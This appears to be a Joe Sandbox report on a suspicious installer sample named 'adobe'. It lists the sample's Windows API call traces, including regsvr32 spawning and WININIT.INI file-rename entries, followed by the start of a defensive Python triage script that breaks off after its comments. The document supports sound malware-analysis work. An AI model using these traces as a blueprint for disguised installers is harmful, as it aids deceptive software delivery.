• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
• Opcode ID: f94b587d3163664f08296e8e66d4ea1cca2761d86ecc9a78ac1a813879e59919
• Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
• Opcode Fuzzy Hash: f94b587d3163664f08296e8e66d4ea1cca2761d86ecc9a78ac1a813879e59919
• Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045861B,?,00000000,0045867E,?,?,02333858,00000000), ref: 00458499
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004585B0,?,00000000,00000001,00000000,00000000,00000000,0045861B), ref: 004584F6
• GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004585B0,?,00000000,00000001,00000000,00000000,00000000,0045861B), ref: 00458503
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045854F
• GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458589,?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004585B0,?,00000000), ref: 00458575
• GetLastError.KERNEL32(?,?,00000000,00000001,00458589,?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004585B0,?,00000000), ref: 0045857C
  • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
• String ID: CreateEvent$TransactNamedPipe
• API String ID: 2182916169-3012584893
• Opcode ID: 62687ccf4654ca9d71a0da89f230f01d7b8f7d759262e3146565ef7b38a810dd
• Instruction ID: 833dc3b8b07b8aac3dc6316824f20e9e6236f4ec1b001489005bcbcce005ffc2
• Opcode Fuzzy Hash: 62687ccf4654ca9d71a0da89f230f01d7b8f7d759262e3146565ef7b38a810dd
• Instruction Fuzzy Hash: ED418375A00608FFDB15DF95C981F9EB7F8EB48714F10406AF904E7292DA78DE44CA68
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045617D,?,?,00000031,?), ref: 00456040
• GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456046
• LoadTypeLib.OLEAUT32(00000000,?), ref: 00456093
  • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressErrorHandleLastLoadModuleProcType
• String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
• API String ID: 1914119943-2711329623
• Opcode ID: 02d74b974742779c9eba2f86e197c7bee5317770a2e1002d4043483d3a57369f
• Instruction ID: fd543e9f45e6c9c7d3ae9c39d990c3b16e81fcc474a24b8266df5fe5801867fa
• Opcode Fuzzy Hash: 02d74b974742779c9eba2f86e197c7bee5317770a2e1002d4043483d3a57369f
• Instruction Fuzzy Hash: 8E319471A00A04AFDB01EFAACD51D6BB7BAEB89B117528466F804D3653DA38DD04C768
Uniqueness
Uniqueness Score: -1.00%

APIs
• RectVisible.GDI32(?,?), ref: 00416E23
• SaveDC.GDI32(?), ref: 00416E37
• IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
• RestoreDC.GDI32(?,?), ref: 00416E75
• CreateSolidBrush.GDI32(00000000), ref: 00416EF5
• FrameRect.USER32(?,?,?), ref: 00416F28
• DeleteObject.GDI32(?), ref: 00416F32
• CreateSolidBrush.GDI32(00000000), ref: 00416F42
• FrameRect.USER32(?,?,?), ref: 00416F75
• DeleteObject.GDI32(?), ref: 00416F7F
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
• String ID:
• API String ID: 375863564-0
• Opcode ID: 6cccffc3355cba574b9c3bb7a3869f970cd619d04b1e686754c1b9faace0ec80
• Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
• Opcode Fuzzy Hash: 6cccffc3355cba574b9c3bb7a3869f970cd619d04b1e686754c1b9faace0ec80
• Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
• GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
• GetFileType.KERNEL32(?,000000F5), ref: 00404C11
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
• GetLastError.KERNEL32(000000F5), ref: 00404C46
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1694776339-0
                                                                                                                                                          • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                          • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                                                                          • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                          • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemMenu.USER32(00000000,00000000), ref: 00422243
• DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
• DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
• DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
• DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
• DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
• DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
• EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
• EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Menu$Delete$EnableItem$System
• String ID:
• API String ID: 3985193851-0
• Opcode ID: b9aef185119106b62d1909b50254a2e9e7161919e58d2eca8b004cc57ac8b3b6
• Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
• Opcode Fuzzy Hash: b9aef185119106b62d1909b50254a2e9e7161919e58d2eca8b004cc57ac8b3b6
• Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
Uniqueness

Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNEL32(10000000), ref: 004801A8
• FreeLibrary.KERNEL32(02310000), ref: 004801BC
• SendNotifyMessageA.USER32(00020466,00000496,00002710,00000000), ref: 0048022E
Strings
• Not restarting Windows because Setup is being run from the debugger., xrefs: 004801DD
• Restarting Windows., xrefs: 00480209
• GetCustomSetupExitCode, xrefs: 0048005D
• DeinitializeSetup, xrefs: 004800B9
• Deinitializing Setup., xrefs: 0048001E
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: FreeLibrary$MessageNotifySend
• String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
• API String ID: 3817813901-1884538726
• Opcode ID: d47b7e57319d749007a9a755c2177fcb094d913dfc3eafe5d164ec163588edb2
• Instruction ID: cee3c0feaa82f34ff8ccc77a058218ffec1e5727e3f2c49cfa21192a85072f61
• Opcode Fuzzy Hash: d47b7e57319d749007a9a755c2177fcb094d913dfc3eafe5d164ec163588edb2
• Instruction Fuzzy Hash: BD51A3306142009FD761EB69E949B5E77E4EB19714F6088BBFC04C73A2DB389C49CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• SHGetMalloc.SHELL32(?), ref: 00460EEF
• GetActiveWindow.USER32 ref: 00460F53
• CoInitialize.OLE32(00000000), ref: 00460F67
• SHBrowseForFolder.SHELL32(?), ref: 00460F7E
• 756CD120.OLE32(00460FBF,00000000,?,?,?,?,?,00000000,00461043), ref: 00460F93
• SetActiveWindow.USER32(?,00460FBF,00000000,?,?,?,?,?,00000000,00461043), ref: 00460FA9
• SetActiveWindow.USER32(?,?,00460FBF,00000000,?,?,?,?,?,00000000,00461043), ref: 00460FB2
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
• String ID: A
• API String ID: 2698730301-3554254475
• Opcode ID: 73697bf61bfb662cf97866c946a68ef996e92b42bbd051bc0dafbf817f01a1ea
• Instruction ID: 2c77ed91a8417aff65a374401c3b3fdadfccc17f1b0de07755fa7fda1c92976a
• Opcode Fuzzy Hash: 73697bf61bfb662cf97866c946a68ef996e92b42bbd051bc0dafbf817f01a1ea
• Instruction Fuzzy Hash: 98314FB0D00208AFDB14EFA6D885A9EBBF8EB09304F51447AF504E7251E7789A04CB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00471BBD,?,?,?,00000008,00000000,00000000,00000000,?,00471E19,?,?,00000000,00472084), ref: 00471B20
  • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471BBD,?,?,?,00000008,00000000,00000000,00000000,?,00471E19), ref: 00471B97
• RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471BBD,?,?,?,00000008,00000000,00000000,00000000), ref: 00471B9D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
• String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
• API String ID: 884541143-1710247218
• Opcode ID: 88d258bcb0cfe34371e37a5fb7e2f2979d44c951644709225c3257378c2324f9
• Instruction ID: df1969d3b2e75b623ed12d1a57b4041883c9501f119f73ce0aa373245b01fd35
• Opcode Fuzzy Hash: 88d258bcb0cfe34371e37a5fb7e2f2979d44c951644709225c3257378c2324f9
• Instruction Fuzzy Hash: FF11E2307005187BD711EA6E8C82B9F73ADDB45714FA0817BB414B72D1EB3CAE02865C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(02310000,inflateInit_), ref: 0045CADD
• GetProcAddress.KERNEL32(02310000,inflate), ref: 0045CAED
• GetProcAddress.KERNEL32(02310000,inflateEnd), ref: 0045CAFD
• GetProcAddress.KERNEL32(02310000,inflateReset), ref: 0045CB0D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressProc
                                                                                                                                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                                                                          • API String ID: 190572456-3516654456
                                                                                                                                                          • Opcode ID: e365b530c7071674726e76c88cbd42779a0a52ee7bf24cd43f30570c52ec1394
                                                                                                                                                          • Instruction ID: 525a7e9e0fda6c84af7054bd7e5f3a46cafb7a33014c5953919690b79c8ceac0
                                                                                                                                                          • Opcode Fuzzy Hash: e365b530c7071674726e76c88cbd42779a0a52ee7bf24cd43f30570c52ec1394
                                                                                                                                                          • Instruction Fuzzy Hash: 41012CB0901300DEDB14DF36BECA72736B5E760B96F14903B9C54992A2D778144CCB9C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                                                                                          • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                                                                                          • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                                                                                          • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Color$StretchText
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2984075790-0
                                                                                                                                                          • Opcode ID: 76d092ad3213984249078ebe0a84a9e6ce1a1d401503c160032635bc52d3de4f
                                                                                                                                                          • Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
                                                                                                                                                          • Opcode Fuzzy Hash: 76d092ad3213984249078ebe0a84a9e6ce1a1d401503c160032635bc52d3de4f
                                                                                                                                                          • Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457570,?, /s ",?,regsvr32.exe",?,00457570), ref: 004574E2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseDirectoryHandleSystem
                                                                                                                                                          • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                                                                          • API String ID: 2051275411-1862435767
                                                                                                                                                          • Opcode ID: 8b63587add3ee564f98abe6a23ec759f239168e66a918bf5f758ba5d13c8dbb7
                                                                                                                                                          • Instruction ID: c75e28b62514bd1008de2d5da4676738b051ff84ac3b4320ed53282cf2518592
                                                                                                                                                          • Opcode Fuzzy Hash: 8b63587add3ee564f98abe6a23ec759f239168e66a918bf5f758ba5d13c8dbb7
                                                                                                                                                          • Instruction Fuzzy Hash: 9F412770E0430C6BDB11EFD5D842B8DB7F9AF45305F50407BA908BB692D7789A098B5D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
                                                                                                                                                          • GetSysColor.USER32(00000014), ref: 0044CA04
                                                                                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
                                                                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
                                                                                                                                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 0044CA56
                                                                                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
                                                                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
                                                                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Text$Color$Draw$OffsetRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1005981011-0
                                                                                                                                                          • Opcode ID: 0dde5dfefa80da91ffb1f415c8619ddafc2b78759cb1f1039b07dde114a2dbdb
                                                                                                                                                          • Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
                                                                                                                                                          • Opcode Fuzzy Hash: 0dde5dfefa80da91ffb1f415c8619ddafc2b78759cb1f1039b07dde114a2dbdb
                                                                                                                                                          • Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453363
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                          • String ID: (rI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                                                                          • API String ID: 390214022-1223912792
                                                                                                                                                          • Opcode ID: 77d8440133c81d55e85531f21278540480c21e6c928ae3c30ee1a0d437c9d52f
                                                                                                                                                          • Instruction ID: c373c87e8fcbee70df1f3a37a90da570fcb7fd3878d7a318cdf2ff94c307cb29
                                                                                                                                                          • Opcode Fuzzy Hash: 77d8440133c81d55e85531f21278540480c21e6c928ae3c30ee1a0d437c9d52f
                                                                                                                                                          • Instruction Fuzzy Hash: 88912430A00109ABDB11EFA5D842BDEB7B5EF49346F508567F800B7392D778AE098B58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%
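
The function records above are raw listings; the script below is an added triage example, not part of the Joe Sandbox report and not code recovered from the analysed sample. It parses "APIs" bullets and the "$"-joined "String ID" field in exactly the shape the report prints them, then applies three checks that these records support: the GetProcAddress chain resolving zlib's inflateInit_/inflate/inflateEnd/inflateReset at run time, calls the report could only name by a bare address such as 73A24D40.GDI32 (the export was not resolved in the dump and should be checked by hand against the loaded module), and the strings of the functions that build a `regsvr32.exe /s` command line and write a `WININIT.INI [rename]` entry. The sample records are copied from the report text; the function names (`parse_record`, `triage`), the regex, the threshold of two inflate symbols and the finding messages are my own assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List

# One "APIs" bullet as the report prints it, e.g.
#   • GetProcAddress.KERNEL32(02310000,inflate), ref: 0045CAED
#   • 73A24D40.GDI32(?,00000000), ref: 0041AA03      (export not resolved)
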